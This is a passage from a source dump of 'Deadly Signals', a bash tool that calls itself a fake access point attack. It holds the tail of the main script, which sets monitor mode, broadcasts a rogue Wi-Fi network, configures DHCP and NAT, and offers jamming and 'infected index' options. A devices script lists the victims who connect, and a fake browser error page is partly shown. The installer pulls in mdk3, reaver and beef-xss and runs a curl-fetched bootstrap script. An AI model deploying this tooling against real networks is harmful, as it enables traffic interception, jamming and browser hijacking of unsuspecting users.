--list-rules | grep "POSTROUTING -o $ONLINE_INTERFACE" > /dev/null 715 | if [ $? != 0 ] 716 | then echo -e "\n[${Green}+${Color_Off}]Go Online.." 717 | sleep 3 718 | iptables --table nat -A POSTROUTING -o $ONLINE_INTERFACE -j MASQUERADE 719 | else 720 | echo -e "\n[${Red}x${Color_Off}]Connection is already ${Green}ON${Color_Off}" 721 | sleep 3 722 | 723 | fi 724 | 725 | elif [ $ATTACKOPTION = 7 ];then 726 | xterm -geometry 71x33+0+200 -bg "#000000" -title ConnectedDevices -e watch -c -n 6 -t files/devices $MON_INTERFACE & 727 | 728 | elif [ $ATTACKOPTION = 8 ] 729 | then infected_index 730 | 731 | elif [ $ATTACKOPTION = 9 ] 732 | then jamming_attack_start 733 | sleep 4 734 | 735 | elif [ $ATTACKOPTION = 10 ] 736 | then jamming_attack_stop 737 | sleep 4 738 | 739 | else 740 | echo -e "[${Red}x${Color_Off}]False Input!" 741 | sleep 1 742 | 743 | 744 | fi 745 | 746 | done 747 | 748 | } 749 | 750 | 751 | function main { 752 | trap normal_interrupt SIGINT 753 | banner 754 | check_root 755 | check_system 756 | sleep 0.1 757 | check_nic_support 758 | sleep 0.1 759 | check_firewall 760 | sleep 0.1 761 | check_files 762 | banner 763 | Informations 764 | 765 | echo -e "\n[$Blue?$Color_Off]Start the fake AP? (Y/N) : " 766 | header 767 | read START_BROADCAST 768 | 769 | while [ -z $START_BROADCAST ] 770 | do echo -e "[${Yellow}!${Color_Off}]Type y = 'yes' or n = 'no'\n" 771 | echo -e "\n[$Blue?$Color_Off]Start the fake AP? (y,n) : " 772 | header 773 | read START_BROADCAST 774 | done 775 | 776 | trap hard_interrupt SIGINT 777 | if [ $START_BROADCAST = y ] || [ $START_BROADCAST = Y ] 778 | then 779 | 780 | 781 | #Monitor Mode 782 | echo -e "[$BBlue*$Color_Off]Enable monitor mode" 783 | monitor_mode 784 | sleep 3 785 | 786 | #Start airbase 787 | echo -e "[$BBlue*$Color_Off]Broadcasting the WiFi" 788 | broadcast_ap 789 | sleep 5 790 | 791 | #Setting IP's 792 | echo -e "[$BBlue*$Color_Off]Set IP/Gateway for AP" 793 | set_ips 794 | sleep 3 795 | 796 | #Configure dnsmasq 797 | echo -e "[$BBlue*$Color_Off]Enable DHCP Server" 798 | dhcp_configuration 799 | 800 | 801 | #Done 802 | echo -e "[${Green}+${Color_Off}]Everything is done succesfully" 803 | echo -e "\n[${Yellow}!${Color_Off}]${Red}Press Ctrl+C to kill the broadcast of AP${Color_Off}\n" 804 | echo -e "[${Yellow}!${Color_Off}]Press ${Green}Enter${Color_Off} to show attacking options" 805 | ## Make option here! ## 806 | header 807 | read BROADCAST_PROCESSING 808 | if [ -z $BROADCAST_PROCESSING ] 809 | then attack_options 810 | fi 811 | ## TODO: the last header have to do some works :) ## 812 | 813 | elif [ $START_BROADCAST = n ] || [ $START_BROADCAST = N ] 814 | then 815 | echo -e "\n[${Red}x$Color_Off]Shutting down" 816 | exit 0 817 | 818 | else 819 | return 820 | fi 821 | 822 | } 823 | 824 | main 825 | -------------------------------------------------------------------------------- /files/devices: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | ## Colors ## 3 | Black='\033[0;30m' # Black 4 | Red='\033[0;31m' # Red 5 | Green='\033[0;32m' # Green 6 | Yellow='\033[0;33m' # Yellow 7 | Blue='\033[0;34m' # Blue 8 | Purple='\033[0;35m' # Purple 9 | Cyan='\033[0;36m' # Cyan 10 | White='\033[0;37m' # White 11 | Color_Off='\033[0m' # Text Reset 12 | # Bold 13 | BBlack='\033[1;30m' # Black 14 | BRed='\033[1;31m' # Red 15 | BGreen='\033[1;32m' # Green 16 | BYellow='\033[1;33m' # Yellow 17 | BBlue='\033[1;34m' # Blue 18 | BPurple='\033[1;35m' # Purple 19 | BCyan='\033[1;36m' # Cyan 20 | BWhite='\033[1;37m' # White 21 | 22 | arp-scan --interface $1 10.0.0.1/24 | sed '/Interface/d;/WARNING/d;/Starting/d;/kernel/d;/arp-scan/d' > arp 23 | echo 24 | devices=$(more arp | awk '{print $1}' | sort -u) 25 | #gateway=$( more arp | grep -i gateway | awk '{print $2}' | sed -e 's/(//g' | sed -e 's/)//g') 26 | device_mac=$(more arp | awk '{print $2}' | sort -u) 27 | hex_chars=$(more arp | awk '{print $2}' | sed -e 's/\:/\-/g' | tr [:lower:] [:upper:] | sed -e 's/^\(.\{8\}\).*/\1/' | sort -u) 28 | more arp >> .attemptsip 29 | attempts=$(more .attemptsip | awk '{print $2}' | sort -u | sed '/^$/d' | wc -l) 30 | ###################################################################33 31 | echo -e """ ${Purple} 32 | __ __ 33 | | \ _ _ _|| (_ . _ _ _ | _ 34 | |__/(-(_|(_||\/ __)|(_)| )(_||_) 35 | / _/ 36 | ${Green}Connection Board${Color_Off}\n""" 37 | 38 | echo -e "${White}[${Red}*${Color_Off}${White}]Attempts: ${Green}$attempts${White} " 39 | echo -e """${White}---------------------------------------------------------------- 40 | ${Blue}Device IP ${Yellow} | ${Blue}Device MAC Address ${Yellow}| ${Blue}Device Name ${Green} 41 | """ 42 | echo -e "${Purple}" 43 | for device in ${devices[@]};do 44 | printf "$devices " 45 | for mac in ${device_mac[@]};do 46 | printf "$mac" 47 | for name in ${hex_chars};do 48 | more /usr/share/maclookup/oui.txt | grep $name | sed -e 's/(hex)//g' | cut -d" " -f4-30 49 | echo 50 | done 51 | done 52 | done 53 | -------------------------------------------------------------------------------- /files/error_page/.error.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DevoOverkill9/deadlysignals/0a8e1e5f7ff10c420b784b9ecefa74f0fd6c8ce9/files/error_page/.error.png -------------------------------------------------------------------------------- /files/error_page/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Problem loading page 5 | 6 | 7 | 8 | 9 |
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157 | 158 | -------------------------------------------------------------------------------- /install: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | Black='\033[0;30m' # Black 3 | Red='\033[0;31m' # Red 4 | Green='\033[0;32m' # Green 5 | Yellow='\033[0;33m' # Yellow 6 | Blue='\033[0;34m' # Blue 7 | Purple='\033[0;35m' # Purple 8 | Cyan='\033[0;36m' # Cyan 9 | White='\033[0;37m' # White 10 | Color_Off='\033[0m' # Text Reset 11 | # Bold 12 | BBlack='\033[1;30m' # Black 13 | BRed='\033[1;31m' # Red 14 | BGreen='\033[1;32m' # Green 15 | BYellow='\033[1;33m' # Yellow 16 | BBlue='\033[1;34m' # Blue 17 | BPurple='\033[1;35m' # Purple 18 | BCyan='\033[1;36m' # Cyan 19 | BWhite='\033[1;37m' # White 20 | 21 | if [ $USER != root ] 22 | then echo -e "$Red[x]You Don't have root user privileges${Color_Off}" 23 | exit 24 | else 25 | clear 26 | 27 | INSTALLING_ERROR="[${Red}x${Color_Off}]Error while installing requierd tools!" 28 | DEBIAN_INSTALL="apt-get -qq install $1" 29 | DEBIAN_TOOLS=( "dnsmasq" "hostapd" "iw" "wvdial" "bridge-utils" "macchanger" "mdk3" "openssl" "aircrack-ng" "iptables" "vde2" "reaver" "apache2" "beef-xss" "xterm" "arp-scan" "maclookup" ) 30 | ARCH_INSTALL="pacman -S --noconfirm $1" 31 | ARCH_TOOLS=( "dnsmasq" "hostapd" "iw" "wvdial" "bridge-utils" "macchanger" "mdk3" "openssl" "aircrack-ng" "iptables" "vde2" "reaver" "apache" "beef" "xterm" "arp-scan" "maclookup" ) 32 | 33 | 34 | function debian_error { 35 | echo -e $INSTALLING_ERROR 36 | echo -e "\n[${Yellow}!${Color_Off}]${Cyan}Looks like a requierd tool wasn't found in your repositories .. ${Green}We highly recommend to add kali linux repositories temporary to install the requierd tools then we will remove it${Color_Off}" 37 | printf "\n[${Blue}?${Color_Off}]Accept?(y/n) " 38 | read REPO_ADD 39 | if [[ $REPO_ADD == "y" ]]; then 40 | echo -e "[${Green}+${Color_Off}]Adding the repositories.." 41 | apt-key adv --keyserver pgp.mit.edu --recv-keys ED444FF07D8D0BF6 42 | echo "#Kali Repos -- Added by deadlysignals --" >> /etc/apt/sources.list 43 | echo "deb http://http.kali.org/kali kali-rolling main contrib non-free" >> /etc/apt/sources.list 44 | apt-get -qq update 45 | else 46 | echo -e "[${Red}x${Color_Off}]Exiting..";exit 1 47 | fi 48 | } 49 | 50 | function arch_error { 51 | echo -e $INSTALLING_ERROR 52 | echo -e "\n[${Yellow}!${Color_Off}]${Cyan}Looks like a requierd tool wasn't found in your repositories .. ${Green}We highly recommend to add blackarch repositories temporary to install the requierd tools${Color_Off}" 53 | printf "\n[${Blue}?${Color_Off}]Accept?(y/n) " 54 | read REPO_ADD 55 | if [[ $REPO_ADD == "y" ]];then 56 | echo -e "[${Green}+${Color_Off}]Adding the repositories.." 57 | curl -O https://blackarch.org/strap.sh;chmod 777 strap.sh;./strap.sh 58 | pacman -Syy 59 | 60 | else 61 | echo -e "[${Red}x${Color_Off}]Exiting..";exit 1 62 | fi 63 | } 64 | echo -e """$Yellow 65 | _____ _ _ _ _ 66 | |_ _| | | | || |(_) 67 | | | _ __ ___ | |_ __ _ | || | _ _ __ __ _ 68 | | | | _ \ / __|| __|/ _ || || || || _ \ / _ | 69 | _| |_ | | | |\__ \| |_| (_| || || || || | | || (_| | _ _ 70 | |_____||_| |_||___/ \__|\__,_||_||_||_||_| |_| \__, |(_)(_) 71 | __/ | 72 | |___/ 73 | $Red<$Color_Off Tool Information $Red>$Color_Off 74 | 75 | [$Cyan 1 $Color_Off]$Blue Tool Name $Red:$Color_Off Deadly Signals 76 | [$Cyan 2 $Color_Off]$Blue Version $Red:$Color_Off 4.0 77 | [$Cyan 3 $Color_Off]$Blue Coded By $Red:$Color_Off 0V3RK!113R 78 | [$Cyan 4 $Color_Off]$Blue Tool Type $Red:$Color_Off Fake Access Point Attack 79 | 80 | 81 | """ 82 | echo -e "[${Blue}*${Color_Off}]We gonne install some tools to your system\n" 83 | read -p "Continue? (y,n): " yn 84 | 85 | ## Run Debian installation ## 86 | 87 | if [ -d /etc/apt ] 88 | then 89 | echo -e "[${Green}+${Color_Off}]system : ${Blue}Debian${Color_Off}" 90 | 91 | case $yn in 92 | [Yy]* ) 93 | #update 94 | echo -e "[${BBlue}*${Color_Off}]Updating repositories..\n" 95 | sleep 1 96 | echo -e "[${Yellow}!${Color_Off}]it may take some time\n" 97 | apt-get -qq update 98 | if [[ $? != 0 ]]; then echo -e "[${Red}x${Color_Off}]Error while updating your repositories!";exit 1;fi 99 | 100 | ## INSTALLING ## 101 | for debian_tool in ${DEBIAN_TOOLS[@]};do 102 | echo -e "[${BBlue}*${Color_Off}]Install $debian_tool" ;$DEBIAN_INSTALL $debian_tool 103 | if [[ $? != 0 ]];then debian_error;$DEBIAN_INSTALL $debian_tool;fi 104 | done 105 | 106 | echo -e "[${BBlue}*${Color_Off}]Installing the tool" 107 | chmod 777 deadlysignals 108 | more /etc/apt/sources.list | grep 'Added by deadlysignals' > /dev/null 109 | if [[ $? -eq 0 ]]; then sed -i '/Added by deadlysignals/d' /etc/apt/sources.list;sed -i '/kali/d' /etc/apt/sources.list;fi 110 | 111 | echo -e "[${Green}+${Color_Off}]Tool has been installed successfully!\n" 112 | echo -e "[${Yellow}!${Color_Off}]You can run the tool by typing ${Yellow}sudo ./deadlysignals${Color_Off}" 113 | exit 0;; 114 | [Nn]* ) 115 | echo -e "[${Red}x${Color_Off}]Exiting.." 116 | exit 0;; 117 | * ) 118 | echo "y = yes , n = no" 119 | exit 1;; 120 | esac 121 | fi 122 | 123 | ## Run Arch Installaton ## 124 | if [ -d /etc/pacman.d ] 125 | then 126 | echo -e "[${Green}+${Color_Off}]system : ${Red}Arch${Color_Off}" 127 | case $yn in 128 | [Yy]* ) 129 | #update 130 | echo -e "[${BBlue}*${Color_Off}]Updating respositories.." 131 | pacman -Syy 132 | if [ $? != 0 ];then exit 1;fi 133 | #installing 134 | for arch_tool in ${ARCH_TOOLS[@]};do 135 | echo -e "[${BBlue}*${Color_Off}]Install $arch_tool" 136 | pacman -Qs $arch_tool > /dev/null 137 | if [[ $? != 0 ]];then 138 | $ARCH_INSTALL $arch_tool 139 | if [ $? != 0 ];then echo -e $INSTALLING_ERROR;arch_error;$ARCH_INSTALL $arch_tool;fi 140 | fi 141 | done 142 | 143 | #install tool 144 | echo -e "[${BBlue}*${Color_Off}]Installing the tool" 145 | chmod 777 deadlysignals 146 | echo -e "[${Green}+${Color_Off}]Tool has been installed successfully!\n" 147 | echo -e "[${Yellow}!${Color_Off}]You can run the tool by typing ${Yellow}sudo ./deadlysignals${Color_Off}" 148 | exit 0;; 149 | [Nn]* ) 150 | echo -e "[${Red}x${Color_Off}]Exiting.." 151 | exit 0;; 152 | * ) 153 | echo "y = yes , n = no" 154 | exit 1;; 155 | esac 156 | fi 157 | fi 158 | --------------------------------------------------------------------------------